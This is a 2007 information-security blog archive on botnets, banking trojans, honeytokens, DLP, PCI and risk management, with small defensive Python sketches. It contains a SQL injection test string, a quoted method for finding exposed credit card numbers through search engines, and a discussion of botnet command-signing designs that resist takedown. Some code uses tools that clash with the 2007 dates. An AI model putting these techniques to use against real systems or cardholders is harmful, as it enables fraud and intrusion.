Monday, December 17, 2007

I'm alive!

New year, new blog. This is my blog about information security. I'm still setting everything up.

Thursday, December 13, 2007

Another bot prediction that comes true

I've just read this on Network World:

Botnet-controlled Trojan robbing online bank customers

Well, take a look at my presentation at BH Europe this year (March). This was there, as well as the method being used by the malware from that article:

"The Trojan has the ability to use a man-in-the-middle attack, a kind of shoulder-surfing when someone logs into a bank account. It can inject a request for a Social Security number or other information, and it's very dynamic. It's targeted for each specific bank." (Don Jackson, SecureWorks)

So, another prediction from that presentation has just been confirmed.

Thursday, November 22, 2007

New trends, new threats

I've just read about Intel's concept of "portable data centers". Living in a country where people steal ATMs, I can already picture cases of "stolen data centers"... As always, new trends bring new threats for us to think about.

Wednesday, November 7, 2007

Honeytokens on databases

I recently discovered David Litchfield's blog. It was a good surprise to see that he posted today a tip about how to deploy "tripwires", or "honeytokens", on databases. I understand that this kind of resource is very important for identifying insiders. If you manage a database for a big company, it's worth a try.
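I can't reproduce Litchfield's exact technique here, but the core idea fits in a few lines. A minimal sketch in Python with SQLite (all names and the log format are made up): plant a fake record that no legitimate process should ever touch, then alert whenever it shows up in the database audit trail.

```python
import sqlite3

HONEYTOKEN_SSN = "900-00-1234"  # a marker value no real record should contain

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (name TEXT, ssn TEXT)")
# Plant the tripwire: a fake customer no legitimate process has a reason to read.
conn.execute("INSERT INTO customers VALUES (?, ?)", ("John Honeypot", HONEYTOKEN_SSN))
conn.commit()

def scan_audit_log(lines):
    """Alert whenever the database audit/query log references the honeytoken."""
    for line in lines:
        if HONEYTOKEN_SSN in line:
            print("ALERT: honeytoken touched ->", line.strip())

# Example: a captured audit trail showing someone browsing where they shouldn't
scan_audit_log([
    "2007-11-07 14:02 user=jsmith SELECT * FROM customers WHERE ssn='900-00-1234'",
])
```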

Thursday, November 1, 2007

Right on the bullseye about the insider threat

I was planning to talk about one of my favorite resources in my blogroll, Securosis. This post about the insider threat reminded me of it. Look at these remarks from Mr. Mogull and you'll not only understand the "insider threat" better but also see why this is a very good feed to have in your blogroll:

  1. "Once an external attacker penetrates perimeter security and/or compromises a trusted user account, they become the insider threat.

  2. Thus, from a security controls perspective it often makes little sense to distinguish between the insider threat and external attackers- there are those with access to your network, and those without. Some are authorized, some aren’t.

  3. The best defenses against malicious employees are often business process controls, not security technologies.

  4. The technology cost to reduce the risks of the insider threat to levels comparable to the external threat are materially greater without business process controls.

  5. The number of potential external attackers is the population of the Earth with access to a computer. The number of potential malicious employees is no greater than the total number of employees.

  6. If you allow contractors and partners the same access to your network and resources as your employees, but fail to apply security controls to their systems, you must assume they are compromised.

  7. Detective controls with real-time alerting and an efficient incident response process are usually more effective for protecting internal systems than preventative technology controls, which more materially increase the overall business cost by interfering with business processes.

  8. Preventative controls built into the business process are more efficient than external technological preventative controls."
The highlight on number 7 is mine. That's the reason why I believe that monitoring the internal network is sooooo important.

Pete Lindstrom and Linda Stutsman about "best practices"

This post from Mr. Lindstrom is very interesting, mainly because I totally agree with him that "there is no such thing as best practices, but I also believe there really should be such a thing". It's very hard to work in a field where you can't show that you performed well. For me in particular, it's even worse to see very bad professionals claiming that they are selling/deploying "best practices".

I also like when Mrs. Stutsman says that "There may a best practice within an industry but it's tough to go across industries". PCI-DSS is a very good example of that.

Putting this together with a comment from Anton Aylward that I mentioned here, I'm starting to believe that we need to build some kind of "basics best practices". We already know pretty much everything about how to deal with the basic aspects of Information Security, so let's put aside those things that will always change from business to business and build something that every company can use as a way to ensure that its security doesn't suck, at least. Using Anton's words again, "Lets worry about the baseline before we try to address the esoteric".

Tuesday, October 30, 2007

Finally something good about NAC

I usually don't give much credit to NAC articles and news on Network Computing. They are usually that old crap about new miraculous products. However, this little piece is very good. Jeff Prince explains quite well which kinds of NAC implementations are worth something and which are not. Of course, looking at his signature I noticed it's from a company that sells NAC products, but I agree with his point of view in this article. After performing several security assessments I am a passionate advocate of internal LAN segregation to avoid the "M&M's" syndrome (hard shell, soft center). NAC can make it much easier.

Wednesday, October 17, 2007

Spafford and magical solutions

Eugene Spafford is one of the best minds in the infosec field. This post from him is very much aligned with that other one from Anton Aylward that I mentioned here yesterday. I personally agree with a great part of what he is saying there. In a nutshell, he says that we usually spend too much time and money looking for "patch-like" solutions when we already know how to do things the right way. A good example, quoting him: "We spend huge amounts on detecting botnets and worms, and deploying firewalls to stop them, rather than constructing network-based systems with architectures that don't support such malware." If we look at the infosec problem as an isolated problem, he is more than right. It's just like Marcus Ranum, who usually follows a similar line.

However, I believe that this approach is too technical, even simplistic. For me it's the same as saying "we already know how to produce electric cars, so let's replace all the others with them to solve the global warming issue". There are several linked factors in these issues that we simply can't ignore. There are economic factors linked to the environmental issues, just as there are economic issues, compatibility issues, business priority issues and complexity issues, among others, linked to the infosec issue. I wonder if all the problems we deal with could be solved as easily as Dr. Spafford suggests. I like to keep my mind open to "out of the box" solutions, but we can't just ignore all the linked matters when talking about security.

Tuesday, October 16, 2007

Another post on the wall

I've just read another of those posts that should be framed and hung on a wall. This post from Anton Aylward is great, even though he is just stating something very obvious. Super ninja risk analysis initiatives sometimes make people forget about the basics, even when the expected result of the RA is learning that those basic things should be treated first!

Some pieces of the post are very interesting, like this analogy: "So it gets to be, if you'll pardon the analogy, like worrying over the diseases of civilization like Alzheimer's, Osteoarthritis/Osteoporosis, ALS, Macular degeneration, diseases due to over-rich diets, Senescence in general when you don't have a adequate diet or clean water to drink."

His closing remark is also simple and perfect: "Lets worry about the baseline before we try to address the esoteric."

This reminds me of a case I saw. I arrived at a place with lots of expectations about deploying risk management processes and policies, but ended up starting by removing root access and providing individual accounts to system administrators, enabling logs, installing critical patches on servers and setting passwords for those pesky "sa" users. Talking about risk management at that time was the same thing as talking about healthy eating habits to someone who is dying from a bleeding cut.

And, just to mention, it was funny to deal with the problems above and then hear from the auditors that "users should change their passwords every 30 days and not 90". :-)

Application Security and MS

It's no news that several of the best application security minds are working for MS today. This blog is living proof of that. There is a very good post there about the first line of defense for web applications: input validation. I'm participating in a web app development project that includes a small code audit component. During the project specification I demanded that the input validation code be the minimum part verified during the process. There is a picture in that post that shows exactly why: input validation problems are at the center of several types of vulnerabilities, from SQL injection to buffer overflows. The post is the first part of a series, according to the author. I hope to see a lot more about the subject there.
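Just to make the point concrete (this is a generic sketch, not the code from the MS post): validating input against a whitelist before it reaches the database or the rendering layer kills several vulnerability classes at once.

```python
import re

# Whitelist patterns: accept only what each field is expected to look like.
PATTERNS = {
    "username": re.compile(r"[A-Za-z0-9_]{3,20}"),
    "zip_code": re.compile(r"\d{5}(-\d{4})?"),
}

def validate(field: str, value: str) -> bool:
    """Return True only if the whole value matches the expected format."""
    pattern = PATTERNS.get(field)
    return bool(pattern and pattern.fullmatch(value))

print(validate("username", "augusto_pb"))               # True
print(validate("username", "x'; DROP TABLE users;--"))  # False: rejected early
```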

Thursday, October 11, 2007

Log mining

Anton Chuvakin wrote a nice piece about a log analysis he performed on a compromised box. It was interesting to see some techniques I'm using in my work and in my master's thesis. He also mentioned some experience with profiling users (the information that one week to one month of data is enough was very valuable to me) and some types of analysis that can be made following that concept. I'm trying to build something along those lines, based not only on user accounts but also on computers, services, applications, physical locations and many other "entities". My goal is to end up with a list of common situations (observables) that can be used to detect anomalies usually linked to the presence of an attacker.

And sorry, Dr. A, I'm planning to try that in a SIEM way instead of a log analysis approach :-)
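To give an idea of the kind of per-entity profiling I have in mind, here is a toy sketch (the event format is invented): learn each user's usual login hours from a window of history, then flag logins that fall far outside it.

```python
from collections import defaultdict
from datetime import datetime

# events: (user, timestamp) pairs, e.g. parsed from authentication logs
history = [
    ("alice", "2007-10-01 09:12"), ("alice", "2007-10-02 08:55"),
    ("alice", "2007-10-03 09:30"), ("bob", "2007-10-01 14:02"),
]

def build_baseline(events):
    """Profile each user by the set of hours at which they usually log in."""
    baseline = defaultdict(set)
    for user, ts in events:
        hour = datetime.strptime(ts, "%Y-%m-%d %H:%M").hour
        baseline[user].add(hour)
    return baseline

def is_anomalous(baseline, user, ts, tolerance=1):
    """Flag a login whose hour is not near any hour seen in the baseline."""
    hour = datetime.strptime(ts, "%Y-%m-%d %H:%M").hour
    return all(abs(hour - h) > tolerance for h in baseline.get(user, ()))

profiles = build_baseline(history)
print(is_anomalous(profiles, "alice", "2007-10-10 03:47"))  # True: a 3am login
```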

Wednesday, October 10, 2007

Good analogy

This post on Securosis is a very good analogy and also a good piece about the limits of encryption as a security measure. I always liked physical analogies, especially those involving armies and military tactics. I'm trying to read a little more about police strategies, as they seem to be a very good option to compare with information security. War is usually simpler: you can see a very well defined perimeter and where the enemy is. City crime, however, is quite different. I hope to explore this a little more in the future.

Friday, October 5, 2007

Gunnar Peterson and security budget

This post from Gunnar Peterson about security budgets is extremely interesting. The comparison he suggests between security budgets and IT budgets is a very good way to detect misconceptions about security needs and the alignment between the IT strategy and the security strategy.

However, it's important to mention that some network solutions can solve problems whose root cause is in other layers. It's also important to perform the comparison from a timeline perspective, as you may need to invest more in a specific layer now to address a gap created by past IT investments in that layer that came without the related security budget.

Thursday, October 4, 2007

Killer encryption application

Rob Newby wrote a very nice piece about encryption usage. I believe the most important message there is that the focus should be on key management issues, not algorithm strength and key sizes.

Wednesday, September 26, 2007

Brazilian Bank Trojans

I just finished reading this paper from F-Secure on bank-targeting trojans. It is the first one that properly covers the Brazilian banking trojan phenomenon. However, I'd like to share some comments about these two paragraphs:

"Why are banking trojans so common in Brazil? Actually, malware in general is a big problem in Brazil – not just banking trojans. Brazil has a large population of which an ever-growing part is now going online. As there is a constant flow of new computer users, mass social engineering attacks are very successful in compromising users' machines. [23]"

There is an additional component: the Internet Banking scenario here in Brazil is very advanced. Many people use IB to make almost all the transactions their accounts need. So, not only are there lots of bank customers using the IB system, but it's also very easy for the fraudsters to extract money from the accounts, as there are many ways to do that, from paying bills to regular funds transfers. The Brazilian banking system allows you to electronically transfer funds from your account to any other account in any other bank immediately, so it's very easy to make money "vanish".

"Banking trojans targeting Brazilian banks are typically not targeting any banks outside the country. This is fairly natural, since the gangs making and distributing these trojans are local, they do not seem to have any connections to international criminals, and they usually come from a very poor background. This means that crime, for them, is a way to make an income and they do not really know that much about the international banking system. Even if these gangs would get their hands on overseas banking credentials they would not know how to use that information. [23]"

There are some very well structured criminal groups using and funding the development of those trojans. The latest operations by our Federal Police showed their size and complexity. They are probably not targeting foreign accounts because it would be harder to bring the money to Brazil after stealing it, while they still have plenty of "room for growth" in the local market.

Monday, September 24, 2007

About SIEMs and insider threats

This post is incredibly interesting to me, as I'm actively working on SIEMs, MSS for security monitoring and insider threats. What I really liked about it is that it points to some of the ideas I like most: it mentions how a company's behavior toward its employees shapes their actions, the misconception about the level of automation that can be reached, and the need for someone behind the nuts and bolts putting intelligence into the process. That's really a nice piece.

Monday, August 27, 2007

DLP and honeytokens

Four years have passed since I coined the term "honeytoken". I talked a lot about it at that time, as did Lance Spitzner and others from the honeypots field. The subject, however, hasn't been discussed much in the last few years. Well, not until the DLP - Data Leakage Prevention - fever started. I used to run some Google queries for "honeytoken" to see how the concept was being used, but I hadn't been doing that for some months. It was a great surprise to see the results when I performed the same query today.

It is obvious that honeytokens are a good way to implement some DLP functionality. I'm thinking about trying to build some kind of dynamic system to deploy and monitor them. Here is how it would work: imagine that you want a bunch of sensitive Office files to be monitored by the system. You point the files to the system and it starts to monitor them by integrating itself into the operating system of the server where the files are hosted. When a user requests one of those files, the system dynamically generates a honeytoken and includes it in the file. The system links this honeytoken to that specific user and includes it in a list of strings monitored by the main enforcement points, like proxy servers, firewalls, IDSes and other UTM devices. It can also use some kind of distributed agent on the workstations to verify what users are doing with those files. I know that this sounds like the description of a DRM system, but the aim here is not to control what the user can do, only to monitor the information flow.

I know that there are vulnerabilities in this design; all of them were already discussed when DLP started to gain attention. However, I'd really like to see a DLP product using this approach, as it wouldn't have to analyze the information, only look for honeytokens. It would probably be easier to deploy and faster. Is there anybody trying to do something like this?
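A rough sketch of the core of that design, assuming all the plumbing around it (file interception, the egress hooks at proxies and firewalls) already exists: issue a unique token per user/file request, keep the mapping, and trace any token seen leaving the network back to the user who received the file.

```python
import uuid

token_registry = {}  # token -> (user, filename)

def issue_honeytoken(user, filename):
    """Generate a unique marker to embed in the copy of the file served to this user."""
    token = uuid.uuid4().hex
    token_registry[token] = (user, filename)
    return token  # the interception layer would inject this into the document

def check_egress(payload):
    """Called by proxies/firewalls/IDS on outbound content; returns the leak source."""
    for token, (user, filename) in token_registry.items():
        if token in payload:
            return f"LEAK: '{filename}' given to {user} seen leaving the network"
    return None

t = issue_honeytoken("jdoe", "salaries.xls")
print(check_egress(f"...random outbound data {t} more data..."))
```

Note that the enforcement points never need to understand the content itself; they only match strings, which is what should make this faster than content-analysis DLP.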

Friday, August 3, 2007

PSI, from Secunia

I believe that the Black Hat/Defcon buzz made this slip past the attention of the great security minds out there. Secunia has just released their PSI - Personal Software Inspector (free!).

PSI addresses a problem that is incredibly dangerous: vulnerabilities in "auxiliary" software. In a certain way, the problem of vulnerabilities in Windows and Office is solved by Microsoft Update. However, almost nobody is acting on the vulnerabilities in software like Adobe Acrobat and Flash, Java virtual machines and the several different media players out there. As a lot of vulnerabilities triggered by malformed data files have been disclosed over the last years, all those software pieces bring a lot of risk to the regular user.

PSI can check (using, of course, the very good vulnerability DB from Secunia) lots of different software and indicate whether it is up to date. I regularly update the software on my desktop, and this was the result after running the tool for the first time:

So, if you are running a Windows desktop, install PSI immediately. It will save you a lot of work in keeping everything updated.

Wednesday, June 13, 2007

XML being used by malware - We said it!!!

My friend André Fucs pointed me to this post from the McAfee Avert Labs blog. They've found a trojan controlled by XML messages, another trend we mentioned in our Black Hat presentation. The next step will probably be signed XML messages.

Monday, June 4, 2007

Grossman on Web App Vuln Scanners

Jeremiah provides some interesting comments on the effectiveness of web application security scanners for specific types of vulnerabilities. From when I used to perform pen tests on web applications, I remember identifying some things in ways that would be very hard to reproduce with an automated tool. I found very interesting results with blind SQL injection, and also just by looking at session tokens and spotting some kind of logic behind them. Automating these things will be very hard.
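To illustrate the session token point with a deliberately crude sketch (tokens and threshold invented): collect tokens from consecutive logins and check whether they decode to a predictable sequence, the kind of reasoning a scanner rarely does.

```python
def looks_sequential(tokens, base=16):
    """Crude check: do the tokens decode to numbers increasing by small steps?"""
    values = [int(t, base) for t in tokens]
    deltas = [b - a for a, b in zip(values, values[1:])]
    return all(0 < d <= 1000 for d in deltas)

# Session tokens captured from a few consecutive logins (hypothetical values)
tokens = ["0005a1f3", "0005a1f7", "0005a1fb", "0005a1ff"]
print(looks_sequential(tokens))  # True: session IDs are guessable
```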

We need to stop thinking that "penetration tests" can be done by some guys running automated tools. I participated in some tests with very skilled people who were able to find subtle configuration vulnerabilities that would have been missed by scanners. I also managed to find ways to jump from one server to another just by browsing through some .ini files, ASP code and so on. Tests like those bring to light vulnerabilities that a simple scanner will never show you: vulnerabilities in processes and procedures, old files with important information forgotten on the server, comments in script code, just to name a few.

When looking for someone to perform a pen test, try to find people who are able to run tests like these. You can ask them about the kinds of vulnerabilities they found during their last tests. If they just mention missing patches and run-of-the-mill SQL injection and XSS, try someone else.

Tuesday, May 29, 2007

Bejtlich - versions

I really enjoyed reading this post from Richard Bejtlich. There is one piece that makes it almost perfect:

"Web 2.0: this is what is here, with more on the way -- essentially indefensible applications all running over port 80 TCP (or at least HTTP) that no developer really understands and for which no one takes responsibility"

I once saw a perfect example of this "no developer really understands". I was called on a weekend by a developer who was trying to deploy his new application into production. Obviously, the usual suspect for the problems he was facing was the firewall.

I spent almost an hour understanding not only where the application was running, but also its architecture. It turned out that he wasn't aware that his web service needed an HTTP server! :-) After solving that specific problem, I scheduled some basic networking classes with that group of developers for the following week. I noticed how deeply they knew Java and other programming stuff, but they didn't have a clue about the data flow of their applications from a network perspective. A nice context to work in, especially if you're trying to control the information flow on your network.

Phrack

Like the phoenix, it's back again from the ashes. Cool.

Friday, May 25, 2007

Stration worm

There is news about the Stration worm, which spreads itself using Skype and can migrate to other networks, like MSN and ICQ. That's very interesting, especially because it's quite aligned with what I presented at Black Hat Europe this year. Although I was talking about botnets, some of the trends apply to all kinds of malware. Using several communication channels is no longer just a theoretical thing; it's a fact.

CC numbers are everywhere

This article from Slashdot is very good. It's funny to see how easy it is to obtain credit card numbers. PCI still has a long way to go in securing this information, if it can be done at all. From the article:

"Some "script kiddie" tricks still work after all: Take the first 8 digits of a standard 16-digit credit card number. Search for them on Google in "nnnn nnnn" form. Since the 8-digit prefix of a given card number is often shared with many other cards, about 1/4 of credit card numbers in my random test, turned up pages that included other credit card numbers, and about 1 in 10 turned up a "treasure trove" of card numbers that were exposed through someone's sloppily written Web app. If the numbers were displayed along with people's names and phone numbers, sometimes I would call the users to tell them that I'd found their cards on the Internet, and many of them said that the cards were still active and that this was the first they'd heard that the numbers had been compromised."

Thursday, May 24, 2007

Risk Management - measuring all components of the equation

OK, just like mentioning E=mc^2 whenever the Theory of Relativity comes up, we always mention RISK = Impact x Probability when talking about risk management. And it's interesting to see how the probability is measured. A good thread on this subject is here.

People usually calculate the probability by looking at what can be done with a specific vulnerability. However, threats need to be considered too. How many people are out there with the Motives, Means and Opportunities (MMO) to exploit that vulnerability?
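A toy numeric illustration (the weights are invented) of why the threat side matters: the same vulnerability produces very different risk figures once the size of the population with motive, means and opportunity is factored into the probability.

```python
def risk(impact, exploitability, threat_population_factor):
    """RISK = Impact x Probability, with probability scaled by the threat side."""
    probability = exploitability * threat_population_factor
    return impact * probability

# Same vulnerability (easy to exploit, high impact), different threat exposure:
internet_facing = risk(impact=9, exploitability=0.8, threat_population_factor=1.0)
internal_only = risk(impact=9, exploitability=0.8, threat_population_factor=0.05)
print(internet_facing, internal_only)  # 7.2 vs 0.36
```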

It's interesting to see that most companies are evaluating their environments to check how exposed they are to specific vulnerabilities, but they are not reliably checking the threat levels related to their business. Banks are perhaps the companies closest to doing this properly, but the others seem to be a little behind.

Two things make this matter interesting to me. One is that there aren't many choices in the market if you decide to hire someone to help you with it. The second is that too few think they need to worry about it at all. What are people out there using to calculate their exposure to certain kinds of threats? Are they doing that at all? It would be nice to hear from those who are doing something about it.

Wednesday, May 16, 2007

HotBot papers

I've just read two papers from the Usenix HotBots workshop. One, from Grizzard, Sharma, Nunnery, Kang and Dagon, gives an overview of p2p botnets. It's interesting to see that the authors identified exactly the same issues that we tried to solve in our Black Hat presentation, especially the hard-coded information needed by the bot to start communicating with its herder.

Another very good paper is the one from Wang, Sparks and Zou, which presents the design of an advanced hybrid p2p botnet. They included in their design the use of digitally signed commands, exactly as we mentioned. They minimized the problem of the hard-coded bootstrap information, but didn't solve it. With our proposed OTP scheme, their botnet design would be a really hard thing to take down. I think we will see more developments on this subject, especially designs merging the concepts from all these papers. It will be something very hard to fight against.
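The signed-command idea itself is plain public-key cryptography. A minimal sketch with the Python cryptography package (Ed25519 here just as a convenient modern example, not what any of these papers used) of why such commands can't be forged or tampered with without the herder's private key:

```python
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# The herder signs commands; every bot carries only the public key.
private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()

command = b"update http://example.com/payload"
signature = private_key.sign(command)

def bot_accepts(cmd: bytes, sig: bytes) -> bool:
    """A bot executes a command only if the signature verifies."""
    try:
        public_key.verify(sig, cmd)
        return True
    except InvalidSignature:
        return False

print(bot_accepts(command, signature))                 # True
print(bot_accepts(b"update http://evil", signature))   # False: tampered command
```

This is exactly why signed commands make takedown hard: a defender who captures a bot gets only the public key, which is useless for injecting counterfeit commands.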

Thursday, May 10, 2007

Power

While reading the well-written "Intro to hackernomics" from Herbert Thompson on Network World, I noticed something quite interesting about threat motivation.

Thompson's first law states that "most attackers aren't evil or insane; they just want something". Money is the natural choice for that something.

However, we can list several incidents that didn't generate any profit for the attacker. Is the first law of hackernomics wrong?

No. The mistake is thinking that the "something" wanted is always money. There is something that has been pursued by men since even before the creation of currency: Power.

"Information is Power", said Robin Morgan. Nothing can be more precise than this concept today. The ubiquitous presence of information systems on today's world makes information like passwords and encryption keys huge power repositories. Can you imagine the power of those who have keys for military communication systems?

Sometimes (almost always) Power can be converted into money. Because of that, some attack motivations can be mistakenly interpreted as monetary. This possibility, however, can't be assumed as a rule. Several people are not directly interested in money, but eagerly pursue power. Terrorists and politicians are good examples.

From this point of view we can understand why some apparently pointless things happen, like virus creation, denial of service attacks and website defacements. Script kiddies and teenage hackers are usually trying to show their friends how powerful they are.

Acknowledging Power as a valid motivation for attackers makes several threats more plausible and understandable. It allows better threat modelling and improves risk assessments. Different countermeasures can also be applied, focusing on reducing the power tied to the target information instead of reducing the possibility of vulnerability exploitation.

Wednesday, May 9, 2007

Security Architecture Blueprint

Gunnar Peterson published a few days ago what he calls the "Security Architecture Blueprint". It is a blueprint of the security services needed to deploy a security architecture, from processes to technologies. Together with the P-CSO from Mike Rothman, I believe it's one of the best support materials for a CSO to use when developing a security plan. The P-CSO will enable you to create a roadmap from a business perspective, while the blueprint from Peterson covers all aspects of the technical side. I was happy to see that the plan I developed a few months ago is quite aligned with it.

The Blueprint is designed in a somewhat layered approach, which really makes sense when you are trying to map high-level risk management goals to processes, procedures and technology controls. It enables you to build an effective Information Security Management System without all that burden from ISO17799/27001, but in a way that lets you reuse all the processes and tools developed if you later need to pass a certification process against that standard.

The document is also very rich in information about security metrics, including a very good sample of an Enterprise Security Dashboard. I recommend Peterson's blueprint to all CSOs developing a security strategy and to consultants trying to build a comprehensive product and services portfolio.

SSL FTP on Longhorn

Fernando Cima posted on his blog about a new feature in Windows Longhorn: client and server support for FTP over SSL.

That's a very important feature for those fighting to improve the security of file transfers on their networks (especially those dealing with PCI-DSS). Having it as a native resource will make it easier to convince network and systems administrators to deploy it. Another very good improvement from MS.

Friday, May 4, 2007

Enabling business

Sometimes I catch myself defending "less secure" solutions for specific situations. It feels a little strange, but it usually happens when someone with "canned" security knowledge tries to discuss the risks of some technology, usually as an excuse to avoid the work of making that thing happen. These situations would be funny if they didn't leave others watching the discussion with the impression that the security guy (me) doesn't know as much as the other guy about the issues he raised.

Today I saw this on SecurityBuddha.com:

Stop Disabling and Start Enabling

If information security is to ever have an ounce of credibility in a corporate world it has to stop disabling and start enabling. The days of hiding behind thick piles of self-scribed doctrine and exercising personal dogma laced with stupid egotistical power trips based on technology religion must end. If you talk to most (yes most) folks outside of information security in an environment where this culture is allowed to exist they will usually raise an eyebrow, get their heckles up or even laugh in your face. The locker-room conversation discuss the “thought police” and ways to not tell or involve security about what’s really happening: and quite frankly I don’t blame them. Why?

Because sadly some so called security folks are nothing short of dinosaurs and I suspect exhibit many of the traits above. This article in CSOOnline prove it.

Kill instant messaging. Stop it at the desktop via security and group policies. Stop it at the gateway. Stop it at the firewall. Death to IM. My opinion: This is the best way to go if you can get away with it. If you’re running e-mail and a working phone system in a general office environment, IM is a geek-toy luxury. Simple as that.

Can you blame people? I often read things and laugh, sometimes I read them and get angry and occasionally I read things and don’t know what to say apart from “what “wibbly wobbly” planet do you live on?”

Maybe you would like to kill all cell phones as well? Lets face it they are really annoying. All those people talking and doing business while you try and read your newspaper with your drip coffee and Krispy Kreme.

Maybe that new fangled Internet thing should be shut off period? After all what’s wrong with paper and carrier pigeons?

I hope the author doesn’t work for a publicly traded company. If he does I am calling Kramer for a sell recommendation and I am serious.

As Dilbert once said ” I am not anti-business, I am anti-idiot”.


Yes, he is quite right about it! Another funny thing about blocking IM is that the request usually comes from managers who don't want their teams spending time chatting. So they try to make Security block it, avoiding direct conflict with the team. When I say that I'll only do it if the reasons are clearly stated to the users, they usually give up.

Mark Curphey raises a very important issue in the post above. When you become a problem and overreact to some threats, people will start avoiding bringing Security into their projects, as they expect the same behavior (disabling). Try to show the company that your role is not disabling things. Even when writing reports or providing feedback, try to replace "can't be used" with "can be used with security improvements". I know that sometimes even that is impossible, but don't discard it until you really see that there is no other option.

Wednesday, May 2, 2007

Joanna and Mr. Chuvakin

Today I read a post on Anton Chuvakin's blog about a post from Joanna Rutkowska. He was caught by the "risk assessment pseudo-science", which is also what caught my eye in those posts. She reminds us that even if you could solve the "human factor", you could still be compromised by technical issues, like zero days.

Some might say that this is just FUD. I partially agree with that. However, I think it's extremely important to remind people to avoid focusing on only one side of the triangle (Process, People, Technology). You should try to reduce risk in all of them. OK, maybe you can't avoid zero days, but you must be prepared to deal with them: reduced user privileges, a network with firewalls and ACLs under a good "deny by default" approach, and a good monitoring and detection process/infrastructure. Richard Bejtlich and Chuvakin are very good sources of information about that, even if each uses a different approach (network monitoring / logs). They are complementary.

If you still don't do that, start reading Anton Chuvakin's blog. He wasn't posting much for a long time, but he's back in the blogosphere at full throttle. The posts from my blogroll in the last weeks have come from him.

Monday, April 9, 2007

Two-factor authentication and Banks

Some noise is being made about declarations from Ross Anderson, of Cambridge University, about banks using two-factor authentication to fight phishing.

I partially agree with Mr. Anderson, who says that "There are a whole bunch of things that can go wrong with two-factor authentication". He is right about that. But I believe that two-factor authentication can work if properly deployed.

In our Black Hat presentation last month we showed how malware can beat two-factor authentication on a bank website. The malware doesn't need to steal credentials; it can (1) simply steal the session ID (you may be authenticating with two factors a session that is identified by a simple HTTP cookie or URL parameter) or (2) perform the malicious transactions through the user's own navigation process (check our paper from the presentation).

However, some two-factor authentication devices can be used to authenticate not only the user, but the transaction itself. It's a giant leap forward, as neither of the strategies mentioned above works if you include transaction authentication in the process. It's important to say that it's not just about re-authenticating the user during the transaction, but about authenticating the data of the transaction too, which is what prevents transaction tampering. And it's not that hard; some banks are already doing it, like RaboBank in Europe and the ex-BankBoston (now ItauBank) in Brazil. They use different approaches (hardware token / software digital certificates and digital signature), but both rely on the concept of authenticating transactions. It would be nice to compare fraud numbers from these banks to others. I'm sure we would see very good results from their initiatives.
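Conceptually, transaction authentication means the second factor computes a code over the transaction data itself, not just over a login challenge. A simplified sketch of the concept using an HMAC (real tokens use their own vendor schemes; the shared-secret setup here is hypothetical):

```python
import hmac
import hashlib

# Secret shared between the bank and the user's token/device (hypothetical setup)
device_secret = b"per-device-secret-key"

def transaction_code(amount: str, destination: str) -> str:
    """Authenticate the transaction data, not just the user."""
    message = f"{amount}|{destination}".encode()
    return hmac.new(device_secret, message, hashlib.sha256).hexdigest()[:8]

code = transaction_code("150.00", "account-9876")
# A trojan that tampers with the destination invalidates the code:
print(code == transaction_code("150.00", "attacker-account"))  # False
```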

Tuesday, April 3, 2007

Botnets trends

We (Fucs, Victor and I) have just given our presentation on botnet trends and threats at Black Hat Europe. The content is available on the BH website:

Presentation
White Paper

I would like to receive feedback from the security community. Please feel free to send me any comments.

Tuesday, March 27, 2007

PCI problems

I was thinking about writing something about the problems in the PCI standard. I didn't find the time to do it, but Mark Curphey did, and very well. I agree with almost everything he points out in his article.

I'm also seeing a huge distance between measured risk and security controls when companies try to comply with PCI. Take the encryption requirements: most companies have worse vulnerabilities than a lack of encryption, especially when we are talking about information in databases.

The applications need to access the information, encrypted or not. So, all the paths that allow the applications to access the information are still there. And there is a lot to deal with in the applications, beginning with secure coding (which is covered, although not very well, by the standard) and passing through user profiles and the policies that regulate their access privileges over time.

Besides that, there are many situations where exceptions to the rules are being granted, most of them on the issuers' side. There are lots of old mainframe-based systems in use, and these companies are being allowed to use compensating controls for lots of requirements, as the mainframe environment is "secure". Hey, didn't these guys realize that mainframe security today is mostly achieved through simple obscurity? PCI assessors are not properly verifying the access privileges of people who support production environments. These guys can access lots of information. Now try to find a PCI auditor who knows how to dig into the details of a mainframe to check those privileges. It'll be very hard to find one.

And what about log management? Anything being done? Almost nothing.

Is the personal firewall necessary?

Again on Security Incite, Mike says that there is no need for personal firewalls anymore, as the one provided by the OS seems to be enough for most cases. I agree with him that where it is not enough, you'll want it bundled with other things, like AV and anti-spyware. I believe we will start to see products sold as "endpoint security solutions".

The AVs are already doing anti-spyware, the personal firewalls are doing some AV, and so on. In the near future every desktop protection product will do all this stuff, protecting against "malware" and external attacks.

Corporate editions will also include NAC/NAP integration. There is no sense in installing dozens of agents to keep bad things out; just choose a single good one to do the whole job. It's also a good market trend for companies looking for ways to survive: include all security features in a single agent and sell it as an "endpoint security agent". Nice.

Path of least resistance

I was reading a comment from Mike Rothman about the need for SSL when I found this expression: "path of least resistance". I really like it in the context of security. There are lots of easy things you can do to remove paths of least resistance. Depending on the level of exposure of your organization, this may be all you need to do to achieve a reasonable level of security. I remember several security measures that, when discussed by more technical guys, seem not so relevant, but we can't ignore how many less savvy attackers are out there trying to exploit our systems. A control that can stop 90% of them is better than nothing at all. I'd rather deal with 10% of a threat than 100% of it. Just don't ignore that 10%. You can consciously choose to live with it, but don't ignore it.

Thursday, March 22, 2007

The Kid is growing!

Four years ago I coined the term "honeytoken" while discussing with Lance Spitzner how honeypot concepts could be used by companies. Now it has made its way into "professional" publications, like Network World. Good to see that the idea is growing. I believe that honeytokens can be a very good way to implement data monitoring for PCI compliance, for example.

Posts you hang on the wall

Sometimes I see posts on the discussion lists that I think we should "hang on the wall". Today Marcus Ranum sent two paragraphs to the log-analysis list that were so great I'm almost printing them for my office wall:

"All the current trend toward legislating compliance has
accomplished is setting the bar very low, and encouraging
companies to look only at meeting that standard. I've had
senior IT managers tell me "We are going to do the exact
minimum, wherever possible."

In log analysis terms, that means that the logs go to a big
bucket which is periodically dumped into the compost
heap. Nobody'll look in the bucket until someone passes
legislation requiring people to LOOK at it. And, of course,
when that happens, they'll do the exact minimum, &c..."

Congrats Marcus, always sharp!

Tuesday, March 20, 2007

Virtualization and Security

Mr. Antonopoulos has a point in this article for Network World. I don't think security is aligned with the business drivers that are driving the virtualization fever. He uses good examples, such as the security trend toward appliances. Is it aligned with the virtualization model being used today? I don't think so.

Saturday, March 17, 2007

Cobit 4.0 and other standards

